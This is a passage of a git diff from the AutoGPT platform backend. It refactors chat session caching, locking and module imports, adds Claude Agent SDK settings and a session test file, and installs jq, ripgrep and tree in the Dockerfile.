fix(chat/sdk): validate proxy URL before blanking ANTHROPIC_API_KEY

Only override ANTHROPIC_API_KEY="" when both a valid base_url (starts with http) and api_key are configured. Otherwise fall back to SDK default credentials so direct Anthropic usage still works.
refactor(chat): rename sdk_ config prefix to claude_agent_ for clarity
2026-02-12 07:45:14 -05:00 · 2026-02-12 13:37:59 +04:00 · 2026-02-12 13:36:48 +04:00 · 2026-02-12 13:12:42 +04:00 · 2026-02-12 09:10:43 +04:00 · 2026-02-12 08:26:26 +04:00
258 changed files with 5522 additions and 3521 deletions
--- a/autogpt_platform/backend/Dockerfile
+++ b/autogpt_platform/backend/Dockerfile
@@ -62,12 +62,16 @@ ENV POETRY_HOME=/opt/poetry \
    DEBIAN_FRONTEND=noninteractive
 ENV PATH=/opt/poetry/bin:$PATH

-# Install Python, FFmpeg, and ImageMagick (required for video processing blocks)
+# Install Python, FFmpeg, ImageMagick, and CLI tools for agent use
+# CLI tools match ALLOWED_BASH_COMMANDS in security_hooks.py
 RUN apt-get update && apt-get install -y \
    python3.13 \
    python3-pip \
    ffmpeg \
    imagemagick \
+    jq \
+    ripgrep \
+    tree \
    && rm -rf /var/lib/apt/lists/*

 # Copy only necessary files from builder
--- a/autogpt_platform/backend/backend/api/external/v1/routes.py
+++ b/autogpt_platform/backend/backend/api/external/v1/routes.py
@@ -10,7 +10,7 @@ from typing_extensions import TypedDict

 import backend.api.features.store.cache as store_cache
 import backend.api.features.store.model as store_model
-import backend.blocks
+import backend.data.block
 from backend.api.external.middleware import require_permission
 from backend.data import execution as execution_db
 from backend.data import graph as graph_db
@@ -67,7 +67,7 @@ async def get_user_info(
    dependencies=[Security(require_permission(APIKeyPermission.READ_BLOCK))],
 )
 async def get_graph_blocks() -> Sequence[dict[Any, Any]]:
-    blocks = [block() for block in backend.blocks.get_blocks().values()]
+    blocks = [block() for block in backend.data.block.get_blocks().values()]
    return [b.to_dict() for b in blocks if not b.disabled]


@@ -83,7 +83,7 @@ async def execute_graph_block(
        require_permission(APIKeyPermission.EXECUTE_BLOCK)
    ),
 ) -> CompletedBlockOutput:
-    obj = backend.blocks.get_block(block_id)
+    obj = backend.data.block.get_block(block_id)
    if not obj:
        raise HTTPException(status_code=404, detail=f"Block #{block_id} not found.")
    if obj.disabled:
--- a/autogpt_platform/backend/backend/api/external/v1/tools.py
+++ b/autogpt_platform/backend/backend/api/external/v1/tools.py
@@ -15,9 +15,9 @@ from prisma.enums import APIKeyPermission
 from pydantic import BaseModel, Field

 from backend.api.external.middleware import require_permission
-from backend.copilot.model import ChatSession
-from backend.copilot.tools import find_agent_tool, run_agent_tool
-from backend.copilot.tools.models import ToolResponseBase
+from backend.api.features.chat.model import ChatSession
+from backend.api.features.chat.tools import find_agent_tool, run_agent_tool
+from backend.api.features.chat.tools.models import ToolResponseBase
 from backend.data.auth.base import APIAuthorizationInfo

 logger = logging.getLogger(__name__)
--- a/autogpt_platform/backend/backend/api/features/builder/db.py
+++ b/autogpt_platform/backend/backend/api/features/builder/db.py
@@ -10,15 +10,10 @@ import backend.api.features.library.db as library_db
 import backend.api.features.library.model as library_model
 import backend.api.features.store.db as store_db
 import backend.api.features.store.model as store_model
+import backend.data.block
 from backend.blocks import load_all_blocks
-from backend.blocks._base import (
-    AnyBlockSchema,
-    BlockCategory,
-    BlockInfo,
-    BlockSchema,
-    BlockType,
-)
 from backend.blocks.llm import LlmModel
+from backend.data.block import AnyBlockSchema, BlockCategory, BlockInfo, BlockSchema
 from backend.data.db import query_raw_with_schema
 from backend.integrations.providers import ProviderName
 from backend.util.cache import cached
@@ -27,7 +22,7 @@ from backend.util.models import Pagination
 from .model import (
    BlockCategoryResponse,
    BlockResponse,
-    BlockTypeFilter,
+    BlockType,
    CountResponse,
    FilterType,
    Provider,
@@ -93,7 +88,7 @@ def get_block_categories(category_blocks: int = 3) -> list[BlockCategoryResponse
 def get_blocks(
    *,
    category: str | None = None,
-    type: BlockTypeFilter | None = None,
+    type: BlockType | None = None,
    provider: ProviderName | None = None,
    page: int = 1,
    page_size: int = 50,
@@ -674,9 +669,9 @@ async def get_suggested_blocks(count: int = 5) -> list[BlockInfo]:
    for block_type in load_all_blocks().values():
        block: AnyBlockSchema = block_type()
        if block.disabled or block.block_type in (
-            BlockType.INPUT,
-            BlockType.OUTPUT,
-            BlockType.AGENT,
+            backend.data.block.BlockType.INPUT,
+            backend.data.block.BlockType.OUTPUT,
+            backend.data.block.BlockType.AGENT,
        ):
            continue
        # Find the execution count for this block
--- a/autogpt_platform/backend/backend/api/features/builder/model.py
+++ b/autogpt_platform/backend/backend/api/features/builder/model.py
@@ -4,7 +4,7 @@ from pydantic import BaseModel

 import backend.api.features.library.model as library_model
 import backend.api.features.store.model as store_model
-from backend.blocks._base import BlockInfo
+from backend.data.block import BlockInfo
 from backend.integrations.providers import ProviderName
 from backend.util.models import Pagination

@@ -15,7 +15,7 @@ FilterType = Literal[
    "my_agents",
 ]

-BlockTypeFilter = Literal["all", "input", "action", "output"]
+BlockType = Literal["all", "input", "action", "output"]


 class SearchEntry(BaseModel):
--- a/autogpt_platform/backend/backend/api/features/builder/routes.py
+++ b/autogpt_platform/backend/backend/api/features/builder/routes.py
@@ -88,7 +88,7 @@ async def get_block_categories(
 )
 async def get_blocks(
    category: Annotated[str | None, fastapi.Query()] = None,
-    type: Annotated[builder_model.BlockTypeFilter | None, fastapi.Query()] = None,
+    type: Annotated[builder_model.BlockType | None, fastapi.Query()] = None,
    provider: Annotated[ProviderName | None, fastapi.Query()] = None,
    page: Annotated[int, fastapi.Query()] = 1,
    page_size: Annotated[int, fastapi.Query()] = 50,
--- a/autogpt_platform/backend/backend/api/features/chat/completion_consumer.py
+++ b/autogpt_platform/backend/backend/api/features/chat/completion_consumer.py
@@ -119,9 +119,8 @@ class ChatCompletionConsumer:
        """Lazily initialize Prisma client on first use."""
        if self._prisma is None:
            database_url = os.getenv("DATABASE_URL", "postgresql://localhost:5432")
-            prisma = Prisma(datasource={"url": database_url})
-            await prisma.connect()
-            self._prisma = prisma
+            self._prisma = Prisma(datasource={"url": database_url})
+            await self._prisma.connect()
            logger.info("[COMPLETION] Consumer Prisma client connected (lazy init)")
        return self._prisma

--- a/autogpt_platform/backend/backend/api/features/chat/completion_handler.py
+++ b/autogpt_platform/backend/backend/api/features/chat/completion_handler.py
--- a/autogpt_platform/backend/backend/api/features/chat/config.py
+++ b/autogpt_platform/backend/backend/api/features/chat/config.py
@@ -27,12 +27,11 @@ class ChatConfig(BaseSettings):
    session_ttl: int = Field(default=43200, description="Session TTL in seconds")

    # Streaming Configuration
-    max_context_messages: int = Field(
-        default=50, ge=1, le=200, description="Maximum context messages"
-    )
-
    stream_timeout: int = Field(default=300, description="Stream timeout in seconds")
-    max_retries: int = Field(default=3, description="Maximum number of retries")
+    max_retries: int = Field(
+        default=3,
+        description="Max retries for fallback path (SDK handles retries internally)",
+    )
    max_agent_runs: int = Field(default=30, description="Maximum number of agent runs")
    max_agent_schedules: int = Field(
        default=30, description="Maximum number of agent schedules"
@@ -93,6 +92,27 @@ class ChatConfig(BaseSettings):
        description="Name of the prompt in Langfuse to fetch",
    )

+    # Claude Agent SDK Configuration
+    use_claude_agent_sdk: bool = Field(
+        default=True,
+        description="Use Claude Agent SDK for chat completions",
+    )
+    claude_agent_model: str | None = Field(
+        default=None,
+        description="Model for the Claude Agent SDK path. If None, derives from "
+        "the `model` field by stripping the OpenRouter provider prefix.",
+    )
+    claude_agent_max_budget_usd: float | None = Field(
+        default=None,
+        gt=0,
+        description="Max budget in USD per Claude Agent SDK session (None = unlimited)",
+    )
+    claude_agent_max_buffer_size: int = Field(
+        default=10 * 1024 * 1024,  # 10MB (default SDK is 1MB)
+        description="Max buffer size in bytes for Claude Agent SDK JSON message parsing. "
+        "Increase if tool outputs exceed the limit.",
+    )
+
    # Extended thinking configuration for Claude models
    thinking_enabled: bool = Field(
        default=True,
@@ -138,6 +158,17 @@ class ChatConfig(BaseSettings):
            v = os.getenv("CHAT_INTERNAL_API_KEY")
        return v

+    @field_validator("use_claude_agent_sdk", mode="before")
+    @classmethod
+    def get_use_claude_agent_sdk(cls, v):
+        """Get use_claude_agent_sdk from environment if not provided."""
+        # Check environment variable - default to True if not set
+        env_val = os.getenv("CHAT_USE_CLAUDE_AGENT_SDK", "").lower()
+        if env_val:
+            return env_val in ("true", "1", "yes", "on")
+        # Default to True (SDK enabled by default)
+        return True if v is None else v
+
    # Prompt paths for different contexts
    PROMPT_PATHS: dict[str, str] = {
        "default": "prompts/chat_system.md",
--- a/autogpt_platform/backend/backend/api/features/chat/db.py
+++ b/autogpt_platform/backend/backend/api/features/chat/db.py
@@ -14,7 +14,7 @@ from prisma.types import (
    ChatSessionWhereInput,
 )

-from backend.data import db
+from backend.data.db import transaction
 from backend.util.json import SafeJson

 logger = logging.getLogger(__name__)
@@ -147,7 +147,7 @@ async def add_chat_messages_batch(

    created_messages = []

-    async with db.transaction() as tx:
+    async with transaction() as tx:
        for i, msg in enumerate(messages):
            # Build input dict dynamically rather than using ChatMessageCreateInput
            # directly because Prisma's TypedDict validation rejects optional fields
--- a/autogpt_platform/backend/backend/api/features/chat/model.py
+++ b/autogpt_platform/backend/backend/api/features/chat/model.py
@@ -2,7 +2,7 @@ import asyncio
 import logging
 import uuid
 from datetime import UTC, datetime
-from typing import Any, cast
+from typing import Any
 from weakref import WeakValueDictionary

 from openai.types.chat import (
@@ -23,17 +23,26 @@ from prisma.models import ChatMessage as PrismaChatMessage
 from prisma.models import ChatSession as PrismaChatSession
 from pydantic import BaseModel

-from backend.data.db_accessors import chat_db
 from backend.data.redis_client import get_redis_async
 from backend.util import json
 from backend.util.exceptions import DatabaseError, RedisError

+from . import db as chat_db
 from .config import ChatConfig

 logger = logging.getLogger(__name__)
 config = ChatConfig()


+def _parse_json_field(value: str | dict | list | None, default: Any = None) -> Any:
+    """Parse a JSON field that may be stored as string or already parsed."""
+    if value is None:
+        return default
+    if isinstance(value, str):
+        return json.loads(value)
+    return value
+
+
 # Redis cache key prefix for chat sessions
 CHAT_SESSION_CACHE_PREFIX = "chat:session:"

@@ -43,7 +52,28 @@ def _get_session_cache_key(session_id: str) -> str:
    return f"{CHAT_SESSION_CACHE_PREFIX}{session_id}"


-# ===================== Chat data models ===================== #
+# Session-level locks to prevent race conditions during concurrent upserts.
+# Uses WeakValueDictionary to automatically garbage collect locks when no longer referenced,
+# preventing unbounded memory growth while maintaining lock semantics for active sessions.
+# Invalidation: Locks are auto-removed by GC when no coroutine holds a reference (after
+# async with lock: completes). Explicit cleanup also occurs in delete_chat_session().
+_session_locks: WeakValueDictionary[str, asyncio.Lock] = WeakValueDictionary()
+_session_locks_mutex = asyncio.Lock()
+
+
+async def _get_session_lock(session_id: str) -> asyncio.Lock:
+    """Get or create a lock for a specific session to prevent concurrent upserts.
+
+    Uses WeakValueDictionary for automatic cleanup: locks are garbage collected
+    when no coroutine holds a reference to them, preventing memory leaks from
+    unbounded growth of session locks.
+    """
+    async with _session_locks_mutex:
+        lock = _session_locks.get(session_id)
+        if lock is None:
+            lock = asyncio.Lock()
+            _session_locks[session_id] = lock
+        return lock


 class ChatMessage(BaseModel):
@@ -74,26 +104,6 @@ class ChatSession(BaseModel):
    successful_agent_runs: dict[str, int] = {}
    successful_agent_schedules: dict[str, int] = {}

-    def add_tool_call_to_current_turn(self, tool_call: dict) -> None:
-        """Attach a tool_call to the current turn's assistant message.
-
-        Searches backwards for the most recent assistant message (stopping at
-        any user message boundary). If found, appends the tool_call to it.
-        Otherwise creates a new assistant message with the tool_call.
-        """
-        for msg in reversed(self.messages):
-            if msg.role == "user":
-                break
-            if msg.role == "assistant":
-                if not msg.tool_calls:
-                    msg.tool_calls = []
-                msg.tool_calls.append(tool_call)
-                return
-
-        self.messages.append(
-            ChatMessage(role="assistant", content="", tool_calls=[tool_call])
-        )
-
    @staticmethod
    def new(user_id: str) -> "ChatSession":
        return ChatSession(
@@ -162,47 +172,6 @@ class ChatSession(BaseModel):
            successful_agent_schedules=successful_agent_schedules,
        )

-    @staticmethod
-    def _merge_consecutive_assistant_messages(
-        messages: list[ChatCompletionMessageParam],
-    ) -> list[ChatCompletionMessageParam]:
-        """Merge consecutive assistant messages into single messages.
-
-        Long-running tool flows can create split assistant messages: one with
-        text content and another with tool_calls. Anthropic's API requires
-        tool_result blocks to reference a tool_use in the immediately preceding
-        assistant message, so these splits cause 400 errors via OpenRouter.
-        """
-        if len(messages) < 2:
-            return messages
-
-        result: list[ChatCompletionMessageParam] = [messages[0]]
-        for msg in messages[1:]:
-            prev = result[-1]
-            if prev.get("role") != "assistant" or msg.get("role") != "assistant":
-                result.append(msg)
-                continue
-
-            prev = cast(ChatCompletionAssistantMessageParam, prev)
-            curr = cast(ChatCompletionAssistantMessageParam, msg)
-
-            curr_content = curr.get("content") or ""
-            if curr_content:
-                prev_content = prev.get("content") or ""
-                prev["content"] = (
-                    f"{prev_content}\n{curr_content}" if prev_content else curr_content
-                )
-
-            curr_tool_calls = curr.get("tool_calls")
-            if curr_tool_calls:
-                prev_tool_calls = prev.get("tool_calls")
-                prev["tool_calls"] = (
-                    list(prev_tool_calls) + list(curr_tool_calls)
-                    if prev_tool_calls
-                    else list(curr_tool_calls)
-                )
-        return result
-
    def to_openai_messages(self) -> list[ChatCompletionMessageParam]:
        messages = []
        for message in self.messages:
@@ -289,31 +258,42 @@ class ChatSession(BaseModel):
                        name=message.name or "",
                    )
                )
-        return self._merge_consecutive_assistant_messages(messages)
+        return messages


-def _parse_json_field(value: str | dict | list | None, default: Any = None) -> Any:
-    """Parse a JSON field that may be stored as string or already parsed."""
-    if value is None:
-        return default
-    if isinstance(value, str):
-        return json.loads(value)
-    return value
+async def _get_session_from_cache(session_id: str) -> ChatSession | None:
+    """Get a chat session from Redis cache."""
+    redis_key = _get_session_cache_key(session_id)
+    async_redis = await get_redis_async()
+    raw_session: bytes | None = await async_redis.get(redis_key)
+
+    if raw_session is None:
+        return None
+
+    try:
+        session = ChatSession.model_validate_json(raw_session)
+        logger.info(
+            f"[CACHE] Loaded session {session_id}: {len(session.messages)} messages, "
+            f"last_roles={[m.role for m in session.messages[-3:]]}"  # Last 3 roles
+        )
+        return session
+    except Exception as e:
+        logger.error(f"Failed to deserialize session {session_id}: {e}", exc_info=True)
+        raise RedisError(f"Corrupted session data for {session_id}") from e


-# ================ Chat cache + DB operations ================ #
-
-# NOTE: Database calls are automatically routed through DatabaseManager if Prisma is not
-#       connected directly.
-
-
-async def cache_chat_session(session: ChatSession) -> None:
-    """Cache a chat session in Redis (without persisting to the database)."""
+async def _cache_session(session: ChatSession) -> None:
+    """Cache a chat session in Redis."""
    redis_key = _get_session_cache_key(session.session_id)
    async_redis = await get_redis_async()
    await async_redis.setex(redis_key, config.session_ttl, session.model_dump_json())


+async def cache_chat_session(session: ChatSession) -> None:
+    """Cache a chat session without persisting to the database."""
+    await _cache_session(session)
+
+
 async def invalidate_session_cache(session_id: str) -> None:
    """Invalidate a chat session from Redis cache.

@@ -329,6 +309,77 @@ async def invalidate_session_cache(session_id: str) -> None:
        logger.warning(f"Failed to invalidate session cache for {session_id}: {e}")


+async def _get_session_from_db(session_id: str) -> ChatSession | None:
+    """Get a chat session from the database."""
+    prisma_session = await chat_db.get_chat_session(session_id)
+    if not prisma_session:
+        return None
+
+    messages = prisma_session.Messages
+    logger.debug(
+        f"[DB] Loaded session {session_id}: {len(messages) if messages else 0} messages, "
+        f"roles={[m.role for m in messages[-3:]] if messages else []}"  # Last 3 roles
+    )
+
+    return ChatSession.from_db(prisma_session, messages)
+
+
+async def _save_session_to_db(
+    session: ChatSession, existing_message_count: int
+) -> None:
+    """Save or update a chat session in the database."""
+    # Check if session exists in DB
+    existing = await chat_db.get_chat_session(session.session_id)
+
+    if not existing:
+        # Create new session
+        await chat_db.create_chat_session(
+            session_id=session.session_id,
+            user_id=session.user_id,
+        )
+        existing_message_count = 0
+
+    # Calculate total tokens from usage
+    total_prompt = sum(u.prompt_tokens for u in session.usage)
+    total_completion = sum(u.completion_tokens for u in session.usage)
+
+    # Update session metadata
+    await chat_db.update_chat_session(
+        session_id=session.session_id,
+        credentials=session.credentials,
+        successful_agent_runs=session.successful_agent_runs,
+        successful_agent_schedules=session.successful_agent_schedules,
+        total_prompt_tokens=total_prompt,
+        total_completion_tokens=total_completion,
+    )
+
+    # Add new messages (only those after existing count)
+    new_messages = session.messages[existing_message_count:]
+    if new_messages:
+        messages_data = []
+        for msg in new_messages:
+            messages_data.append(
+                {
+                    "role": msg.role,
+                    "content": msg.content,
+                    "name": msg.name,
+                    "tool_call_id": msg.tool_call_id,
+                    "refusal": msg.refusal,
+                    "tool_calls": msg.tool_calls,
+                    "function_call": msg.function_call,
+                }
+            )
+        logger.debug(
+            f"[DB] Saving {len(new_messages)} messages to session {session.session_id}, "
+            f"roles={[m['role'] for m in messages_data]}"
+        )
+        await chat_db.add_chat_messages_batch(
+            session_id=session.session_id,
+            messages=messages_data,
+            start_sequence=existing_message_count,
+        )
+
+
 async def get_chat_session(
    session_id: str,
    user_id: str | None = None,
@@ -360,7 +411,7 @@ async def get_chat_session(
        logger.warning(f"Unexpected cache error for session {session_id}: {e}")

    # Fall back to database
-    logger.info(f"Session {session_id} not in cache, checking database")
+    logger.debug(f"Session {session_id} not in cache, checking database")
    session = await _get_session_from_db(session_id)

    if session is None:
@@ -376,53 +427,13 @@ async def get_chat_session(

    # Cache the session from DB
    try:
-        await cache_chat_session(session)
-        logger.info(f"Cached session {session_id} from database")
+        await _cache_session(session)
    except Exception as e:
        logger.warning(f"Failed to cache session {session_id}: {e}")

    return session


-async def _get_session_from_cache(session_id: str) -> ChatSession | None:
-    """Get a chat session from Redis cache."""
-    redis_key = _get_session_cache_key(session_id)
-    async_redis = await get_redis_async()
-    raw_session: bytes | None = await async_redis.get(redis_key)
-
-    if raw_session is None:
-        return None
-
-    try:
-        session = ChatSession.model_validate_json(raw_session)
-        logger.info(
-            f"Loading session {session_id} from cache: "
-            f"message_count={len(session.messages)}, "
-            f"roles={[m.role for m in session.messages]}"
-        )
-        return session
-    except Exception as e:
-        logger.error(f"Failed to deserialize session {session_id}: {e}", exc_info=True)
-        raise RedisError(f"Corrupted session data for {session_id}") from e
-
-
-async def _get_session_from_db(session_id: str) -> ChatSession | None:
-    """Get a chat session from the database."""
-    prisma_session = await chat_db().get_chat_session(session_id)
-    if not prisma_session:
-        return None
-
-    messages = prisma_session.Messages
-    logger.info(
-        f"Loading session {session_id} from DB: "
-        f"has_messages={messages is not None}, "
-        f"message_count={len(messages) if messages else 0}, "
-        f"roles={[m.role for m in messages] if messages else []}"
-    )
-
-    return ChatSession.from_db(prisma_session, messages)
-
-
 async def upsert_chat_session(
    session: ChatSession,
 ) -> ChatSession:
@@ -443,7 +454,7 @@ async def upsert_chat_session(

    async with lock:
        # Get existing message count from DB for incremental saves
-        existing_message_count = await chat_db().get_chat_session_message_count(
+        existing_message_count = await chat_db.get_chat_session_message_count(
            session.session_id
        )

@@ -460,7 +471,7 @@ async def upsert_chat_session(

        # Save to cache (best-effort, even if DB failed)
        try:
-            await cache_chat_session(session)
+            await _cache_session(session)
        except Exception as e:
            # If DB succeeded but cache failed, raise cache error
            if db_error is None:
@@ -481,63 +492,38 @@ async def upsert_chat_session(
        return session


-async def _save_session_to_db(
-    session: ChatSession, existing_message_count: int
-) -> None:
-    """Save or update a chat session in the database."""
-    db = chat_db()
+async def append_and_save_message(session_id: str, message: ChatMessage) -> ChatSession:
+    """Atomically append a message to a session and persist it.

-    # Check if session exists in DB
-    existing = await db.get_chat_session(session.session_id)
+    Acquires the session lock, re-fetches the latest session state,
+    appends the message, and saves — preventing message loss when
+    concurrent requests modify the same session.
+    """
+    lock = await _get_session_lock(session_id)

-    if not existing:
-        # Create new session
-        await db.create_chat_session(
-            session_id=session.session_id,
-            user_id=session.user_id,
+    async with lock:
+        session = await get_chat_session(session_id)
+        if session is None:
+            raise ValueError(f"Session {session_id} not found")
+
+        session.messages.append(message)
+        existing_message_count = await chat_db.get_chat_session_message_count(
+            session_id
        )
-        existing_message_count = 0

-    # Calculate total tokens from usage
-    total_prompt = sum(u.prompt_tokens for u in session.usage)
-    total_completion = sum(u.completion_tokens for u in session.usage)
+        try:
+            await _save_session_to_db(session, existing_message_count)
+        except Exception as e:
+            raise DatabaseError(
+                f"Failed to persist message to session {session_id}"
+            ) from e

-    # Update session metadata
-    await db.update_chat_session(
-        session_id=session.session_id,
-        credentials=session.credentials,
-        successful_agent_runs=session.successful_agent_runs,
-        successful_agent_schedules=session.successful_agent_schedules,
-        total_prompt_tokens=total_prompt,
-        total_completion_tokens=total_completion,
-    )
+        try:
+            await _cache_session(session)
+        except Exception as e:
+            logger.warning(f"Cache write failed for session {session_id}: {e}")

-    # Add new messages (only those after existing count)
-    new_messages = session.messages[existing_message_count:]
-    if new_messages:
-        messages_data = []
-        for msg in new_messages:
-            messages_data.append(
-                {
-                    "role": msg.role,
-                    "content": msg.content,
-                    "name": msg.name,
-                    "tool_call_id": msg.tool_call_id,
-                    "refusal": msg.refusal,
-                    "tool_calls": msg.tool_calls,
-                    "function_call": msg.function_call,
-                }
-            )
-        logger.info(
-            f"Saving {len(new_messages)} new messages to DB for session {session.session_id}: "
-            f"roles={[m['role'] for m in messages_data]}, "
-            f"start_sequence={existing_message_count}"
-        )
-        await db.add_chat_messages_batch(
-            session_id=session.session_id,
-            messages=messages_data,
-            start_sequence=existing_message_count,
-        )
+        return session


 async def create_chat_session(user_id: str) -> ChatSession:
@@ -552,7 +538,7 @@ async def create_chat_session(user_id: str) -> ChatSession:

    # Create in database first - fail fast if this fails
    try:
-        await chat_db().create_chat_session(
+        await chat_db.create_chat_session(
            session_id=session.session_id,
            user_id=user_id,
        )
@@ -564,7 +550,7 @@ async def create_chat_session(user_id: str) -> ChatSession:

    # Cache the session (best-effort optimization, DB is source of truth)
    try:
-        await cache_chat_session(session)
+        await _cache_session(session)
    except Exception as e:
        logger.warning(f"Failed to cache new session {session.session_id}: {e}")

@@ -582,9 +568,8 @@ async def get_user_sessions(
        A tuple of (sessions, total_count) where total_count is the overall
        number of sessions for the user (not just the current page).
    """
-    db = chat_db()
-    prisma_sessions = await db.get_user_chat_sessions(user_id, limit, offset)
-    total_count = await db.get_user_session_count(user_id)
+    prisma_sessions = await chat_db.get_user_chat_sessions(user_id, limit, offset)
+    total_count = await chat_db.get_user_session_count(user_id)

    sessions = []
    for prisma_session in prisma_sessions:
@@ -607,7 +592,7 @@ async def delete_chat_session(session_id: str, user_id: str | None = None) -> bo
    """
    # Delete from database first (with optional user_id validation)
    # This confirms ownership before invalidating cache
-    deleted = await chat_db().delete_chat_session(session_id, user_id)
+    deleted = await chat_db.delete_chat_session(session_id, user_id)

    if not deleted:
        return False
@@ -642,46 +627,26 @@ async def update_session_title(session_id: str, title: str) -> bool:
        True if updated successfully, False otherwise.
    """
    try:
-        result = await chat_db().update_chat_session(session_id=session_id, title=title)
+        result = await chat_db.update_chat_session(session_id=session_id, title=title)
        if result is None:
            logger.warning(f"Session {session_id} not found for title update")
            return False

-        # Invalidate cache so next fetch gets updated title
+        # Update title in cache if it exists (instead of invalidating).
+        # This prevents race conditions where cache invalidation causes
+        # the frontend to see stale DB data while streaming is still in progress.
        try:
-            redis_key = _get_session_cache_key(session_id)
-            async_redis = await get_redis_async()
-            await async_redis.delete(redis_key)
+            cached = await _get_session_from_cache(session_id)
+            if cached:
+                cached.title = title
+                await _cache_session(cached)
        except Exception as e:
-            logger.warning(f"Failed to invalidate cache for session {session_id}: {e}")
+            # Not critical - title will be correct on next full cache refresh
+            logger.warning(
+                f"Failed to update title in cache for session {session_id}: {e}"
+            )

        return True
    except Exception as e:
        logger.error(f"Failed to update title for session {session_id}: {e}")
        return False
-
-
-# ==================== Chat session locks ==================== #
-
-_session_locks: WeakValueDictionary[str, asyncio.Lock] = WeakValueDictionary()
-_session_locks_mutex = asyncio.Lock()
-
-
-async def _get_session_lock(session_id: str) -> asyncio.Lock:
-    """Get or create a lock for a specific session to prevent concurrent upserts.
-
-    This was originally added to solve the specific problem of race conditions between
-    the session title thread and the conversation thread, which always occurs on the
-    same instance as we prevent rapid request sends on the frontend.
-
-    Uses WeakValueDictionary for automatic cleanup: locks are garbage collected
-    when no coroutine holds a reference to them, preventing memory leaks from
-    unbounded growth of session locks. Explicit cleanup also occurs
-    in `delete_chat_session()`.
-    """
-    async with _session_locks_mutex:
-        lock = _session_locks.get(session_id)
-        if lock is None:
-            lock = asyncio.Lock()
-            _session_locks[session_id] = lock
-        return lock
--- a/autogpt_platform/backend/backend/api/features/chat/model_test.py
+++ b/autogpt_platform/backend/backend/api/features/chat/model_test.py
@@ -0,0 +1,119 @@
+import pytest
+
+from .model import (
+    ChatMessage,
+    ChatSession,
+    Usage,
+    get_chat_session,
+    upsert_chat_session,
+)
+
+messages = [
+    ChatMessage(content="Hello, how are you?", role="user"),
+    ChatMessage(
+        content="I'm fine, thank you!",
+        role="assistant",
+        tool_calls=[
+            {
+                "id": "t123",
+                "type": "function",
+                "function": {
+                    "name": "get_weather",
+                    "arguments": '{"city": "New York"}',
+                },
+            }
+        ],
+    ),
+    ChatMessage(
+        content="I'm using the tool to get the weather",
+        role="tool",
+        tool_call_id="t123",
+    ),
+]
+
+
+@pytest.mark.asyncio(loop_scope="session")
+async def test_chatsession_serialization_deserialization():
+    s = ChatSession.new(user_id="abc123")
+    s.messages = messages
+    s.usage = [Usage(prompt_tokens=100, completion_tokens=200, total_tokens=300)]
+    serialized = s.model_dump_json()
+    s2 = ChatSession.model_validate_json(serialized)
+    assert s2.model_dump() == s.model_dump()
+
+
+@pytest.mark.asyncio(loop_scope="session")
+async def test_chatsession_redis_storage(setup_test_user, test_user_id):
+
+    s = ChatSession.new(user_id=test_user_id)
+    s.messages = messages
+
+    s = await upsert_chat_session(s)
+
+    s2 = await get_chat_session(
+        session_id=s.session_id,
+        user_id=s.user_id,
+    )
+
+    assert s2 == s
+
+
+@pytest.mark.asyncio(loop_scope="session")
+async def test_chatsession_redis_storage_user_id_mismatch(
+    setup_test_user, test_user_id
+):
+
+    s = ChatSession.new(user_id=test_user_id)
+    s.messages = messages
+    s = await upsert_chat_session(s)
+
+    s2 = await get_chat_session(s.session_id, "different_user_id")
+
+    assert s2 is None
+
+
+@pytest.mark.asyncio(loop_scope="session")
+async def test_chatsession_db_storage(setup_test_user, test_user_id):
+    """Test that messages are correctly saved to and loaded from DB (not cache)."""
+    from backend.data.redis_client import get_redis_async
+
+    # Create session with messages including assistant message
+    s = ChatSession.new(user_id=test_user_id)
+    s.messages = messages  # Contains user, assistant, and tool messages
+    assert s.session_id is not None, "Session id is not set"
+    # Upsert to save to both cache and DB
+    s = await upsert_chat_session(s)
+
+    # Clear the Redis cache to force DB load
+    redis_key = f"chat:session:{s.session_id}"
+    async_redis = await get_redis_async()
+    await async_redis.delete(redis_key)
+
+    # Load from DB (cache was cleared)
+    s2 = await get_chat_session(
+        session_id=s.session_id,
+        user_id=s.user_id,
+    )
+
+    assert s2 is not None, "Session not found after loading from DB"
+    assert len(s2.messages) == len(
+        s.messages
+    ), f"Message count mismatch: expected {len(s.messages)}, got {len(s2.messages)}"
+
+    # Verify all roles are present
+    roles = [m.role for m in s2.messages]
+    assert "user" in roles, f"User message missing. Roles found: {roles}"
+    assert "assistant" in roles, f"Assistant message missing. Roles found: {roles}"
+    assert "tool" in roles, f"Tool message missing. Roles found: {roles}"
+
+    # Verify message content
+    for orig, loaded in zip(s.messages, s2.messages):
+        assert orig.role == loaded.role, f"Role mismatch: {orig.role} != {loaded.role}"
+        assert (
+            orig.content == loaded.content
+        ), f"Content mismatch for {orig.role}: {orig.content} != {loaded.content}"
+        if orig.tool_calls:
+            assert (
+                loaded.tool_calls is not None
+            ), f"Tool calls missing for {orig.role} message"
+            assert len(orig.tool_calls) == len(loaded.tool_calls)
--- a/autogpt_platform/backend/backend/api/features/chat/response_model.py
+++ b/autogpt_platform/backend/backend/api/features/chat/response_model.py
--- a/autogpt_platform/backend/backend/api/features/chat/routes.py
+++ b/autogpt_platform/backend/backend/api/features/chat/routes.py
@@ -1,5 +1,6 @@
 """Chat API routes for chat session management and streaming via SSE."""

+import asyncio
 import logging
 import uuid as uuid_module
 from collections.abc import AsyncGenerator
@@ -10,22 +11,23 @@ from fastapi import APIRouter, Depends, Header, HTTPException, Query, Response,
 from fastapi.responses import StreamingResponse
 from pydantic import BaseModel

-from backend.copilot import service as chat_service
-from backend.copilot import stream_registry
-from backend.copilot.completion_handler import (
-    process_operation_failure,
-    process_operation_success,
-)
-from backend.copilot.config import ChatConfig
-from backend.copilot.executor.utils import enqueue_copilot_task
-from backend.copilot.model import (
+from backend.util.exceptions import NotFoundError
+
+from . import service as chat_service
+from . import stream_registry
+from .completion_handler import process_operation_failure, process_operation_success
+from .config import ChatConfig
+from .model import (
+    ChatMessage,
    ChatSession,
+    append_and_save_message,
    create_chat_session,
    get_chat_session,
    get_user_sessions,
 )
-from backend.copilot.response_model import StreamFinish, StreamHeartbeat
-from backend.copilot.tools.models import (
+from .response_model import StreamError, StreamFinish, StreamHeartbeat, StreamStart
+from .sdk import service as sdk_service
+from .tools.models import (
    AgentDetailsResponse,
    AgentOutputResponse,
    AgentPreviewResponse,
@@ -47,7 +49,7 @@ from backend.copilot.tools.models import (
    SetupRequirementsResponse,
    UnderstandingUpdatedResponse,
 )
-from backend.util.exceptions import NotFoundError
+from .tracking import track_user_message

 config = ChatConfig()

@@ -239,6 +241,10 @@ async def get_session(
    active_task, last_message_id = await stream_registry.get_active_task_for_session(
        session_id, user_id
    )
+    logger.info(
